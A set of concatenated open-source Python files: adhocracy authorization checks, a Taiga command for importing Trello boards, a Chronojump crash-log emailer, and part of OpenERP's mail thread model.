    check.other('not_user.manage_or_instance.admin',
                not (has('user.manage') or has('instance.admin')))
def show_dashboard(check, u):
    """Authorize the dashboard: only the user themself may see it."""
    show(check, u)
    check.other('user_not_self', u != c.user)
# The watchlist uses the same authorization rule as the dashboard.
show_watchlist = show_dashboard
def delete(check, u):
    """Authorize account deletion: edit rights plus the
    'adhocracy.self_deletion_allowed' config flag (defaults to true)."""
    edit(check, u)
    allowed = asbool(config.get('adhocracy.self_deletion_allowed', 'true'))
    check.other('self_deletion_allowed', not allowed)
def vote(check):
    """Authorize voting: not prohibited, inside an instance, logged in,
    and holding the 'vote.cast' permission."""
    check.other('vote_prohibited', has('vote.prohibit'))
    check.other('not_in_instance', not c.instance)
    check.other(NOT_LOGGED_IN, not c.user)
    check.perm('vote.cast')
|
taigaio/taiga-back
|
taiga/importers/management/commands/import_from_trello.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-present Taiga Agile LLC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand
from django.db.models import Q
from taiga.importers.trello.importer import TrelloImporter
from taiga.users.models import User
class Command(BaseCommand):
    """Import a Trello board into Taiga from the command line.

    Any value not supplied via options (auth token, project id, user
    bindings) is requested interactively.
    """

    def add_arguments(self, parser):
        parser.add_argument('--token', dest="token", type=str,
                            help='Auth token')
        parser.add_argument('--project-id', dest="project_id", type=str,
                            help='Project ID or full name (ex: taigaio/taiga-back)')
        parser.add_argument('--template', dest='template', default="kanban",
                            help='template to use: scrum or kanban (default kanban)')
        # BUG FIX: help text was a copy-paste of --closed-data's.
        parser.add_argument('--ask-for-users', dest='ask_for_users', const=True,
                            action="store_const", default=False,
                            help='Interactively map Trello users to Taiga users')
        parser.add_argument('--closed-data', dest='closed_data', const=True,
                            action="store_const", default=False,
                            help='Import closed data')
        parser.add_argument('--keep-external-reference', dest='keep_external_reference', const=True,
                            action="store_const", default=False,
                            help='Store external reference of imported data')

    def handle(self, *args, **options):
        """Run the import as the 'admin' user, prompting for gaps."""
        admin = User.objects.get(username="admin")
        if options.get('token', None):
            token = options.get('token')
        else:
            # No token given: walk the user through the OAuth handshake.
            (oauth_token, oauth_token_secret, url) = TrelloImporter.get_auth_url()
            print("Go to here and come with your token: {}".format(url))
            oauth_verifier = input("Code: ")
            access_data = TrelloImporter.get_access_token(oauth_token, oauth_token_secret, oauth_verifier)
            token = access_data['oauth_token']
            print("Access token: {}".format(token))
        importer = TrelloImporter(admin, token)
        if options.get('project_id', None):
            project_id = options.get('project_id')
        else:
            print("Select the project to import:")
            for project in importer.list_projects():
                print("- {}: {}".format(project['id'], project['name']))
            project_id = input("Project id: ")
        users_bindings = {}
        if options.get('ask_for_users', None):
            print("Add the username or email for next trello users:")
            for user in importer.list_users(project_id):
                # Keep asking until a valid user is given or input is empty.
                while True:
                    username_or_email = input("{}: ".format(user['fullName']))
                    if username_or_email == "":
                        break
                    try:
                        users_bindings[user['id']] = User.objects.get(Q(username=username_or_email) | Q(email=username_or_email))
                        break
                    except User.DoesNotExist:
                        print("ERROR: Invalid username or email")
        # Use a fresh name instead of rebinding `options` (the original
        # shadowed the command-line options dict, which was confusing).
        import_options = {
            "template": options.get('template'),
            "import_closed_data": options.get("closed_data", False),
            "users_bindings": users_bindings,
            "keep_external_reference": options.get('keep_external_reference')
        }
        importer.import_project(project_id, import_options)
|
GNOME/chronojump-server
|
email_error_log.py
|
import ConfigParser
import smtplib, email, email.encoders, email.mime.text, email.mime.base
import string
config = ConfigParser.ConfigParser()
config.read('/etc/chronojump.conf')
def user_comments_from_log(log):
    """Return the user-comment block of *log* framed by separator lines.

    Logs optionally begin with a '----------' delimited section holding
    the user's own comments; return that section wrapped in the same
    separators, or an empty string when the log has no such section.
    """
    separator = "----------"
    if not log.startswith(separator):
        return ""
    comment = log.split(separator)[1]
    return "%s\n%s\n%s" % (separator, comment, separator)
def metadata_to_dictionary(metadata):
    """
    Given metadata like "1.5.2.0-email_del_usuari2-o-no@usuari.com"
    returns {'version':'1.5.2.0', 'email':'email_del_usuari2-o-no@usuari.com'}
    """
    version, dash, email_part = metadata.partition("-")
    # Without any dash the whole string doubles as both fields, matching
    # the historical split("-", 1) behaviour.
    return {
        'version': version,
        'email': email_part if dash else metadata,
    }
def send(metadata_str, filename, attachment_data):
    """Email the crash log *attachment_data* to the configured recipients.

    :param metadata_str: "version-email" string (see metadata_to_dictionary).
    :param filename: name to give the attached log file.
    :param attachment_data: raw log text; its user-comment section is
        quoted in the message body.
    """
    # Use the canonical email.mime modules instead of the deprecated
    # Python 2 lazy attributes (email.MIMEMultipart / email.mime.Text),
    # which do not exist in Python 3.
    from email.mime.multipart import MIMEMultipart
    from email.mime.text import MIMEText
    metadata = metadata_to_dictionary(metadata_str)
    d = {'user_comments': user_comments_from_log(attachment_data)}
    body = string.Template("""Hola,
Hi ha un nou error log al servidor.
$user_comments
El Servidor
""").substitute(d)
    emailMsg = MIMEMultipart()
    emailMsg['Subject'] = "Crash log - %s - %s" % (metadata['version'],
                                                   metadata['email'])
    emailMsg['From'] = config.get("notification_emails", "from")
    emailMsg['To'] = config.get("notification_emails", "to")
    emailMsg.attach(MIMEText(body))
    # Now attach the file
    fileMsg = email.mime.base.MIMEBase('application', 'octet/stream')
    fileMsg.set_payload(attachment_data)
    email.encoders.encode_base64(fileMsg)
    fileMsg.add_header('Content-Disposition',
                       'attachment;filename="%s"' % (filename))
    emailMsg.attach(fileMsg)
    server = smtplib.SMTP('localhost')
    server.sendmail(config.get("notification_emails", "from"),
                    config.get("notification_emails", "to"),
                    emailMsg.as_string())
if __name__ == "__main__":
    # Manual smoke test: send a fabricated crash log through the real
    # SMTP path (needs a local mail server and /etc/chronojump.conf).
    data = """----------
This is a comment
from the user
----------
this is a log
from C# :-)
"""
    send("1.5.2.0-email_del_usuari2@usuari.com", "this is the file.txt", data)
|
jmesteve/saas3
|
openerp/addons/mail/mail_thread.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2009-today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
import base64
import datetime
import dateutil
import email
try:
import simplejson as json
except ImportError:
import json
from lxml import etree
import logging
import pytz
import time
import xmlrpclib
from email.message import Message
from openerp import tools
from openerp import SUPERUSER_ID
from openerp.addons.mail.mail_message import decode
from openerp.osv import fields, osv, orm
from openerp.osv.orm import browse_record, browse_null
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
def decode_header(message, header, separator=' '):
    """Decode every occurrence of *header* in *message* and join them."""
    raw_values = [value for value in message.get_all(header, []) if value]
    return separator.join(decode(value) for value in raw_values)
class mail_thread(osv.AbstractModel):
''' mail_thread model is meant to be inherited by any model that needs to
act as a discussion topic on which messages can be attached. Public
methods are prefixed with ``message_`` in order to avoid name
collisions with methods of the models that will inherit from this class.
``mail.thread`` defines fields used to handle and display the
communication history. ``mail.thread`` also manages followers of
inheriting classes. All features and expected behavior are managed
by mail.thread. Widgets has been designed for the 7.0 and following
versions of OpenERP.
Inheriting classes are not required to implement any method, as the
default implementation will work for any model. However it is common
to override at least the ``message_new`` and ``message_update``
methods (calling ``super``) to add model-specific behavior at
creation and update of a thread when processing incoming emails.
Options:
- _mail_flat_thread: if set to True, all messages without parent_id
are automatically attached to the first message posted on the
ressource. If set to False, the display of Chatter is done using
threads, and no parent_id is automatically set.
'''
_name = 'mail.thread'
_description = 'Email Thread'
_mail_flat_thread = True
_mail_post_access = 'write'
# Automatic logging system if mail installed
# _track = {
# 'field': {
# 'module.subtype_xml': lambda self, cr, uid, obj, context=None: obj[state] == done,
# 'module.subtype_xml2': lambda self, cr, uid, obj, context=None: obj[state] != done,
# },
# 'field2': {
# ...
# },
# }
# where
# :param string field: field name
# :param module.subtype_xml: xml_id of a mail.message.subtype (i.e. mail.mt_comment)
# :param obj: is a browse_record
# :param function lambda: returns whether the tracking should record using this subtype
_track = {}
    def get_empty_list_help(self, cr, uid, help, context=None):
        """ Override of BaseModel.get_empty_list_help() to generate an help message
        that adds alias information.

        Reads 'empty_list_help_model' / 'empty_list_help_id' /
        'empty_list_help_document_name' from the context; when a mail
        catchall domain is configured, tries to find a relevant mail.alias
        whose address is embedded in the returned help HTML.
        """
        model = context.get('empty_list_help_model')
        res_id = context.get('empty_list_help_id')
        ir_config_parameter = self.pool.get("ir.config_parameter")
        catchall_domain = ir_config_parameter.get_param(cr, uid, "mail.catchall.domain", context=context)
        document_name = context.get('empty_list_help_document_name', _('document'))
        alias = None
        if catchall_domain and model and res_id:  # specific res_id -> find its alias (i.e. section_id specified)
            object_id = self.pool.get(model).browse(cr, uid, res_id, context=context)
            # check that the alias effectively creates new records
            if object_id.alias_id and object_id.alias_id.alias_name and \
                    object_id.alias_id.alias_model_id and \
                    object_id.alias_id.alias_model_id.model == self._name and \
                    object_id.alias_id.alias_force_thread_id == 0:
                alias = object_id.alias_id
        elif catchall_domain and model:  # no specific res_id given -> generic help message, take an example alias (i.e. alias of some section_id)
            alias_obj = self.pool.get('mail.alias')
            alias_ids = alias_obj.search(cr, uid, [("alias_parent_model_id.model", "=", model), ("alias_name", "!=", False), ('alias_force_thread_id', '=', False)], context=context, order='id ASC')
            if alias_ids and len(alias_ids) == 1:
                alias = alias_obj.browse(cr, uid, alias_ids[0], context=context)
        if alias:
            alias_email = alias.name_get()[0][1]
            return _("""<p class='oe_view_nocontent_create'>
                        Click here to add new %(document)s or send an email to: <a href='mailto:%(email)s'>%(email)s</a>
                    </p>
                    %(static_help)s"""
                    ) % {
                'document': document_name,
                'email': alias_email,
                'static_help': help or ''
            }
        if document_name != 'document' and help and help.find("oe_view_nocontent_create") == -1:
            return _("<p class='oe_view_nocontent_create'>Click here to add new %(document)s</p>%(static_help)s") % {
                'document': document_name,
                'static_help': help or '',
            }
        return help
    def _get_message_data(self, cr, uid, ids, name, args, context=None):
        """ Computes:
            - message_unread: has uid unread message for the document
            - message_summary: html snippet summarizing the Chatter for kanban views """
        res = dict((id, dict(message_unread=False, message_unread_count=0, message_summary=' ')) for id in ids)
        user_pid = self.pool.get('res.users').read(cr, uid, uid, ['partner_id'], context=context)['partner_id'][0]
        # search for unread messages, directly in SQL to improve performances
        cr.execute("""  SELECT m.res_id FROM mail_message m
                        RIGHT JOIN mail_notification n
                        ON (n.message_id = m.id AND n.partner_id = %s AND (n.read = False or n.read IS NULL))
                        WHERE m.model = %s AND m.res_id in %s""",
                   (user_pid, self._name, tuple(ids),))
        # Each fetched row is one unread message for that document.
        for result in cr.fetchall():
            res[result[0]]['message_unread'] = True
            res[result[0]]['message_unread_count'] += 1
        for id in ids:
            if res[id]['message_unread_count']:
                title = res[id]['message_unread_count'] > 1 and _("You have %d unread messages") % res[id]['message_unread_count'] or _("You have one unread message")
                res[id]['message_summary'] = "<span class='oe_kanban_mail_new' title='%s'><span class='oe_e'>9</span> %d %s</span>" % (title, res[id].pop('message_unread_count'), _("New"))
        return res
def read_followers_data(self, cr, uid, follower_ids, context=None):
result = []
technical_group = self.pool.get('ir.model.data').get_object(cr, uid, 'base', 'group_no_one', context=context)
for follower in self.pool.get('res.partner').browse(cr, uid, follower_ids, context=context):
is_editable = uid in map(lambda x: x.id, technical_group.users)
is_uid = uid in map(lambda x: x.id, follower.user_ids)
data = (follower.id,
follower.name,
{'is_editable': is_editable, 'is_uid': is_uid},
)
result.append(data)
return result
def _get_subscription_data(self, cr, uid, ids, name, args, user_pid=None, context=None):
""" Computes:
- message_subtype_data: data about document subtypes: which are
available, which are followed if any """
res = dict((id, dict(message_subtype_data='')) for id in ids)
if user_pid is None:
user_pid = self.pool.get('res.users').read(cr, uid, uid, ['partner_id'], context=context)['partner_id'][0]
# find current model subtypes, add them to a dictionary
subtype_obj = self.pool.get('mail.message.subtype')
subtype_ids = subtype_obj.search(cr, uid, ['|', ('res_model', '=', self._name), ('res_model', '=', False)], context=context)
subtype_dict = dict((subtype.name, dict(default=subtype.default, followed=False, id=subtype.id)) for subtype in subtype_obj.browse(cr, uid, subtype_ids, context=context))
for id in ids:
res[id]['message_subtype_data'] = subtype_dict.copy()
# find the document followers, update the data
fol_obj = self.pool.get('mail.followers')
fol_ids = fol_obj.search(cr, uid, [
('partner_id', '=', user_pid),
('res_id', 'in', ids),
('res_model', '=', self._name),
], context=context)
for fol in fol_obj.browse(cr, uid, fol_ids, context=context):
thread_subtype_dict = res[fol.res_id]['message_subtype_data']
for subtype in fol.subtype_ids:
thread_subtype_dict[subtype.name]['followed'] = True
res[fol.res_id]['message_subtype_data'] = thread_subtype_dict
return res
def _search_message_unread(self, cr, uid, obj=None, name=None, domain=None, context=None):
return [('message_ids.to_read', '=', True)]
def _get_followers(self, cr, uid, ids, name, arg, context=None):
fol_obj = self.pool.get('mail.followers')
fol_ids = fol_obj.search(cr, SUPERUSER_ID, [('res_model', '=', self._name), ('res_id', 'in', ids)])
res = dict((id, dict(message_follower_ids=[], message_is_follower=False)) for id in ids)
user_pid = self.pool.get('res.users').read(cr, uid, uid, ['partner_id'], context=context)['partner_id'][0]
for fol in fol_obj.browse(cr, SUPERUSER_ID, fol_ids):
res[fol.res_id]['message_follower_ids'].append(fol.partner_id.id)
if fol.partner_id.id == user_pid:
res[fol.res_id]['message_is_follower'] = True
return res
    def _set_followers(self, cr, uid, id, name, value, arg, context=None):
        """ Inverse of message_follower_ids: apply a list of ORM commands on
            the document's followers.

            ``value`` uses the standard one2many/many2many command tuples:
            (0, 0, vals) create partner, (1, id, vals) update partner,
            (2, id) delete partner, (3, id) unlink, (4, id) link,
            (5,) clear, (6, 0, ids) replace; a bare integer is a link.
            The actual (un)subscription is delegated to message_subscribe /
            message_unsubscribe with the computed set difference.
        """
        if not value:
            return
        partner_obj = self.pool.get('res.partner')
        fol_obj = self.pool.get('mail.followers')

        # read the old set of followers, and determine the new set of followers
        fol_ids = fol_obj.search(cr, SUPERUSER_ID, [('res_model', '=', self._name), ('res_id', '=', id)])
        old = set(fol.partner_id.id for fol in fol_obj.browse(cr, SUPERUSER_ID, fol_ids))
        new = set(old)

        for command in value or []:
            if isinstance(command, (int, long)):
                new.add(command)
            elif command[0] == 0:
                # create the partner, then follow it
                new.add(partner_obj.create(cr, uid, command[2], context=context))
            elif command[0] == 1:
                # update the partner record, keep it as follower
                partner_obj.write(cr, uid, [command[1]], command[2], context=context)
                new.add(command[1])
            elif command[0] == 2:
                # delete the partner record itself and drop the subscription
                partner_obj.unlink(cr, uid, [command[1]], context=context)
                new.discard(command[1])
            elif command[0] == 3:
                new.discard(command[1])
            elif command[0] == 4:
                new.add(command[1])
            elif command[0] == 5:
                new.clear()
            elif command[0] == 6:
                new = set(command[2])

        # remove partners that are no longer followers
        self.message_unsubscribe(cr, uid, [id], list(old-new), context=context)
        # add new followers
        self.message_subscribe(cr, uid, [id], list(new-old), context=context)
def _search_followers(self, cr, uid, obj, name, args, context):
"""Search function for message_follower_ids
Do not use with operator 'not in'. Use instead message_is_followers
"""
fol_obj = self.pool.get('mail.followers')
res = []
for field, operator, value in args:
assert field == name
# TOFIX make it work with not in
assert operator != "not in", "Do not search message_follower_ids with 'not in'"
fol_ids = fol_obj.search(cr, SUPERUSER_ID, [('res_model', '=', self._name), ('partner_id', operator, value)])
res_ids = [fol.res_id for fol in fol_obj.browse(cr, SUPERUSER_ID, fol_ids)]
res.append(('id', 'in', res_ids))
return res
def _search_is_follower(self, cr, uid, obj, name, args, context):
"""Search function for message_is_follower"""
res = []
for field, operator, value in args:
assert field == name
partner_id = self.pool.get('res.users').browse(cr, uid, uid, context=context).partner_id.id
if (operator == '=' and value) or (operator == '!=' and not value): # is a follower
res_ids = self.search(cr, uid, [('message_follower_ids', 'in', [partner_id])], context=context)
else: # is not a follower or unknown domain
mail_ids = self.search(cr, uid, [('message_follower_ids', 'in', [partner_id])], context=context)
res_ids = self.search(cr, uid, [('id', 'not in', mail_ids)], context=context)
res.append(('id', 'in', res_ids))
return res
_columns = {
'message_is_follower': fields.function(_get_followers, type='boolean',
fnct_search=_search_is_follower, string='Is a Follower', multi='_get_followers,'),
'message_follower_ids': fields.function(_get_followers, fnct_inv=_set_followers,
fnct_search=_search_followers, type='many2many', priority=-10,
obj='res.partner', string='Followers', multi='_get_followers'),
'message_ids': fields.one2many('mail.message', 'res_id',
domain=lambda self: [('model', '=', self._name)],
auto_join=True,
string='Messages',
help="Messages and communication history"),
'message_unread': fields.function(_get_message_data,
fnct_search=_search_message_unread, multi="_get_message_data",
type='boolean', string='Unread Messages',
help="If checked new messages require your attention."),
'message_summary': fields.function(_get_message_data, method=True,
type='text', string='Summary', multi="_get_message_data",
help="Holds the Chatter summary (number of messages, ...). "\
"This summary is directly in html format in order to "\
"be inserted in kanban views."),
}
def _get_user_chatter_options(self, cr, uid, context=None):
options = {
'display_log_button': False
}
group_ids = self.pool.get('res.users').browse(cr, uid, uid, context=context).groups_id
group_user_id = self.pool.get("ir.model.data").get_object_reference(cr, uid, 'base', 'group_user')[1]
is_employee = group_user_id in [group.id for group in group_ids]
if is_employee:
options['display_log_button'] = True
return options
    def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
        """ Override: inject the current user's chatter options (e.g. the
            display_log_button flag) into the 'options' attribute of the
            message_ids field nodes of form views. """
        res = super(mail_thread, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=submenu)
        if view_type == 'form':
            doc = etree.XML(res['arch'])
            for node in doc.xpath("//field[@name='message_ids']"):
                # merge the computed options into any options already set on the view
                options = json.loads(node.get('options', '{}'))
                options.update(self._get_user_chatter_options(cr, uid, context=context))
                node.set('options', json.dumps(options))
            res['arch'] = etree.tostring(doc)
        return res
#------------------------------------------------------
# CRUD overrides for automatic subscription and logging
#------------------------------------------------------
    def create(self, cr, uid, values, context=None):
        """ Chatter override :
            - subscribe uid
            - subscribe followers of parent
            - log a creation message

            Recognized context keys:
            - mail_create_nosubscribe: do not subscribe the current user
            - mail_create_nolog: do not post the creation log message
        """
        if context is None:
            context = {}

        # subscribe uid unless asked not to
        if not context.get('mail_create_nosubscribe'):
            pid = self.pool['res.users'].browse(cr, SUPERUSER_ID, uid).partner_id.id
            message_follower_ids = values.get('message_follower_ids') or []  # webclient can send None or False
            message_follower_ids.append([4, pid])
            values['message_follower_ids'] = message_follower_ids
            # add operation to ignore access rule checking for subscription
            context_operation = dict(context, operation='create')
        else:
            context_operation = context
        thread_id = super(mail_thread, self).create(cr, uid, values, context=context_operation)

        # automatic logging unless asked not to (mainly for various testing purpose)
        if not context.get('mail_create_nolog'):
            self.message_post(cr, uid, thread_id, body=_('%s created') % (self._description), context=context)

        # auto_subscribe: take values and defaults into account
        create_values = dict(values)
        for key, val in context.iteritems():
            if key.startswith('default_'):
                create_values[key[8:]] = val
        self.message_auto_subscribe(cr, uid, [thread_id], create_values.keys(), context=context, values=create_values)

        # track values: on creation every tracked field starts from False,
        # so any value set in ``values`` is reported as a change
        track_ctx = dict(context)
        if 'lang' not in track_ctx:
            track_ctx['lang'] = self.pool.get('res.users').browse(cr, uid, uid, context=context).lang
        tracked_fields = self._get_tracked_fields(cr, uid, values.keys(), context=track_ctx)
        if tracked_fields:
            initial_values = {thread_id: dict((item, False) for item in tracked_fields)}
            self.message_track(cr, uid, [thread_id], tracked_fields, initial_values, context=track_ctx)
        return thread_id
    def write(self, cr, uid, ids, values, context=None):
        """ Chatter override: snapshot the tracked fields before writing,
            update auto-subscriptions, then post tracking messages for the
            fields that actually changed. """
        if context is None:
            context = {}
        if isinstance(ids, (int, long)):
            ids = [ids]

        # Track initial values of tracked fields (snapshot BEFORE the write)
        track_ctx = dict(context)
        if 'lang' not in track_ctx:
            track_ctx['lang'] = self.pool.get('res.users').browse(cr, uid, uid, context=context).lang
        tracked_fields = self._get_tracked_fields(cr, uid, values.keys(), context=track_ctx)
        if tracked_fields:
            records = self.browse(cr, uid, ids, context=track_ctx)
            initial_values = dict((this.id, dict((key, getattr(this, key)) for key in tracked_fields.keys())) for this in records)

        # Perform write, update followers
        result = super(mail_thread, self).write(cr, uid, ids, values, context=context)
        self.message_auto_subscribe(cr, uid, ids, values.keys(), context=context, values=values)

        # Perform the tracking
        if tracked_fields:
            self.message_track(cr, uid, ids, tracked_fields, initial_values, context=track_ctx)
        return result
def unlink(self, cr, uid, ids, context=None):
""" Override unlink to delete messages and followers. This cannot be
cascaded, because link is done through (res_model, res_id). """
msg_obj = self.pool.get('mail.message')
fol_obj = self.pool.get('mail.followers')
# delete messages and notifications
msg_ids = msg_obj.search(cr, uid, [('model', '=', self._name), ('res_id', 'in', ids)], context=context)
msg_obj.unlink(cr, uid, msg_ids, context=context)
# delete
res = super(mail_thread, self).unlink(cr, uid, ids, context=context)
# delete followers
fol_ids = fol_obj.search(cr, SUPERUSER_ID, [('res_model', '=', self._name), ('res_id', 'in', ids)], context=context)
fol_obj.unlink(cr, SUPERUSER_ID, fol_ids, context=context)
return res
def copy(self, cr, uid, id, default=None, context=None):
default = default or {}
default['message_ids'] = []
default['message_follower_ids'] = []
return super(mail_thread, self).copy(cr, uid, id, default=default, context=context)
#------------------------------------------------------
# Automatically log tracked fields
#------------------------------------------------------
    def _get_tracked_fields(self, cr, uid, updated_fields, context=None):
        """ Return a structure of tracked fields for the current model.

            A field is tracked when its column has track_visibility 'always',
            or 'onchange' while being listed in ``updated_fields``, or when
            it appears in the model's ``_track`` configuration.

            :param list updated_fields: modified field names
            :return: fields_get() style dict (field name -> description
                dict) restricted to the tracked fields, or an empty list
                when nothing is tracked
        """
        lst = []
        for name, column_info in self._all_columns.items():
            visibility = getattr(column_info.column, 'track_visibility', False)
            if visibility == 'always' or (visibility == 'onchange' and name in updated_fields) or name in self._track:
                lst.append(name)
        if not lst:
            return lst
        return self.fields_get(cr, uid, lst, context=context)
    def message_track(self, cr, uid, ids, tracked_fields, initial_values, context=None):
        """ Post tracking messages for the records whose tracked fields
            changed with respect to the given snapshot.

            :param dict tracked_fields: fields_get() description of the
                tracked fields (see _get_tracked_fields)
            :param dict initial_values: {record_id: {field_name: old_value}}
                snapshot taken before the modification
        """

        def convert_for_display(value, col_info):
            # render a raw field value as user-readable text
            if not value and col_info['type'] == 'boolean':
                return 'False'
            if not value:
                return ''
            if col_info['type'] == 'many2one':
                return value.name_get()[0][1]
            if col_info['type'] == 'selection':
                return dict(col_info['selection'])[value]
            return value

        def format_message(message_description, tracked_values):
            # build the html tracking body: optional description header plus
            # one bullet line per tracked field
            message = ''
            if message_description:
                message = '<span>%s</span>' % message_description
            for name, change in tracked_values.items():
                message += '<div> • <b>%s</b>: ' % change.get('col_info')
                if change.get('old_value'):
                    message += '%s → ' % change.get('old_value')
                message += '%s</div>' % change.get('new_value')
            return message

        if not tracked_fields:
            return True

        for browse_record in self.browse(cr, uid, ids, context=context):
            initial = initial_values[browse_record.id]
            changes = set()
            tracked_values = {}

            # generate tracked_values data structure: {'col_name': {col_info, new_value, old_value}}
            for col_name, col_info in tracked_fields.items():
                initial_value = initial[col_name]
                record_value = getattr(browse_record, col_name)

                # unchanged 'always' fields are still displayed (current value only)
                if record_value == initial_value and getattr(self._all_columns[col_name].column, 'track_visibility', None) == 'always':
                    tracked_values[col_name] = dict(col_info=col_info['string'],
                                                    new_value=convert_for_display(record_value, col_info))
                elif record_value != initial_value and (record_value or initial_value):  # because browse null != False
                    if getattr(self._all_columns[col_name].column, 'track_visibility', None) in ['always', 'onchange']:
                        tracked_values[col_name] = dict(col_info=col_info['string'],
                                                        old_value=convert_for_display(initial_value, col_info),
                                                        new_value=convert_for_display(record_value, col_info))
                    if col_name in tracked_fields:
                        changes.add(col_name)
            if not changes:
                continue

            # find subtypes and post messages or log if no subtype found
            subtypes = []
            for field, track_info in self._track.items():
                if field not in changes:
                    continue
                for subtype, method in track_info.items():
                    if method(self, cr, uid, browse_record, context):
                        subtypes.append(subtype)

            posted = False
            for subtype in subtypes:
                subtype_rec = self.pool.get('ir.model.data').xmlid_to_object(cr, uid, subtype, context=context)
                if not (subtype_rec and subtype_rec.exists()):
                    _logger.debug('subtype %s not found' % subtype)
                    continue
                message = format_message(subtype_rec.description if subtype_rec.description else subtype_rec.name, tracked_values)
                self.message_post(cr, uid, browse_record.id, body=message, subtype=subtype, context=context)
                posted = True
            if not posted:
                # no matching subtype: post a plain log message instead
                message = format_message('', tracked_values)
                self.message_post(cr, uid, browse_record.id, body=message, context=context)
        return True
#------------------------------------------------------
# mail.message wrappers and tools
#------------------------------------------------------
def _needaction_domain_get(self, cr, uid, context=None):
if self._needaction:
return [('message_unread', '=', True)]
return []
def _garbage_collect_attachments(self, cr, uid, context=None):
""" Garbage collect lost mail attachments. Those are attachments
- linked to res_model 'mail.compose.message', the composer wizard
- with res_id 0, because they were created outside of an existing
wizard (typically user input through Chatter or reports
created on-the-fly by the templates)
- unused since at least one day (create_date and write_date)
"""
limit_date = datetime.datetime.utcnow() - datetime.timedelta(days=1)
limit_date_str = datetime.datetime.strftime(limit_date, tools.DEFAULT_SERVER_DATETIME_FORMAT)
ir_attachment_obj = self.pool.get('ir.attachment')
attach_ids = ir_attachment_obj.search(cr, uid, [
('res_model', '=', 'mail.compose.message'),
('res_id', '=', 0),
('create_date', '<', limit_date_str),
('write_date', '<', limit_date_str),
], context=context)
ir_attachment_obj.unlink(cr, uid, attach_ids, context=context)
return True
def check_mail_message_access(self, cr, uid, mids, operation, model_obj=None, context=None):
""" mail.message check permission rules for related document. This method is
meant to be inherited in order to implement addons-specific behavior.
A common behavior would be to allow creating messages when having read
access rule on the document, for portal document such as issues. """
if not model_obj:
model_obj = self
if hasattr(self, '_mail_post_access'):
create_allow = self._mail_post_access
else:
create_allow = 'write'
if operation in ['write', 'unlink']:
check_operation = 'write'
elif operation == 'create' and create_allow in ['create', 'read', 'write', 'unlink']:
check_operation = create_allow
elif operation == 'create':
check_operation = 'write'
else:
check_operation = operation
model_obj.check_access_rights(cr, uid, check_operation)
model_obj.check_access_rule(cr, uid, mids, check_operation, context=context)
def _get_formview_action(self, cr, uid, id, model=None, context=None):
""" Return an action to open the document. This method is meant to be
overridden in addons that want to give specific view ids for example.
:param int id: id of the document to open
:param string model: specific model that overrides self._name
"""
return {
'type': 'ir.actions.act_window',
'res_model': model or self._name,
'view_type': 'form',
'view_mode': 'form',
'views': [(False, 'form')],
'target': 'current',
'res_id': id,
}
def _get_inbox_action_xml_id(self, cr, uid, context=None):
""" When redirecting towards the Inbox, choose which action xml_id has
to be fetched. This method is meant to be inherited, at least in portal
because portal users have a different Inbox action than classic users. """
return ('mail', 'action_mail_inbox_feeds')
    def message_redirect_action(self, cr, uid, context=None):
        """ For a given message, return an action that either
            - opens the form view of the related document if model, res_id, and
              read access to the document
            - opens the Inbox with a default search on the conversation if model,
              res_id
            - opens the Inbox with context propagated

            Routing hints are read from context['params']: message_id, model,
            res_id.
        """
        if context is None:
            context = {}

        # default action is the Inbox action
        # NOTE(review): the result of this browse is discarded — presumably a
        # user existence/access check or cache warm-up; confirm before removing
        self.pool.get('res.users').browse(cr, SUPERUSER_ID, uid, context=context)
        act_model, act_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, *self._get_inbox_action_xml_id(cr, uid, context=context))
        action = self.pool.get(act_model).read(cr, uid, act_id, [])

        # extract the routing hints from the context parameters
        params = context.get('params')
        msg_id = model = res_id = None
        if params:
            msg_id = params.get('message_id')
            model = params.get('model')
            res_id = params.get('res_id')
        if not msg_id and not (model and res_id):
            return action
        if msg_id and not (model and res_id):
            # resolve the target document from the message itself
            msg = self.pool.get('mail.message').browse(cr, uid, msg_id, context=context)
            if msg.exists():
                model, res_id = msg.model, msg.res_id

        # if model + res_id found: try to redirect to the document or fallback on the Inbox
        if model and res_id:
            model_obj = self.pool.get(model)
            if model_obj.check_access_rights(cr, uid, 'read', raise_exception=False):
                try:
                    model_obj.check_access_rule(cr, uid, [res_id], 'read', context=context)
                    if not hasattr(model_obj, '_get_formview_action'):
                        action = self.pool.get('mail.thread')._get_formview_action(cr, uid, res_id, model=model, context=context)
                    else:
                        action = model_obj._get_formview_action(cr, uid, res_id, context=context)
                except (osv.except_osv, orm.except_orm):
                    # no read access on the document: keep the Inbox action
                    pass
            action.update({
                'context': {
                    'search_default_model': model,
                    'search_default_res_id': res_id,
                }
            })
        return action
#------------------------------------------------------
# Email specific
#------------------------------------------------------
def message_get_reply_to(self, cr, uid, ids, context=None):
""" Returns the preferred reply-to email address that is basically
the alias of the document, if it exists. """
if not self._inherits.get('mail.alias'):
return [False for id in ids]
return ["%s@%s" % (record['alias_name'], record['alias_domain'])
if record.get('alias_domain') and record.get('alias_name')
else False
for record in self.read(cr, SUPERUSER_ID, ids, ['alias_name', 'alias_domain'], context=context)]
#------------------------------------------------------
# Mail gateway
#------------------------------------------------------
def message_capable_models(self, cr, uid, context=None):
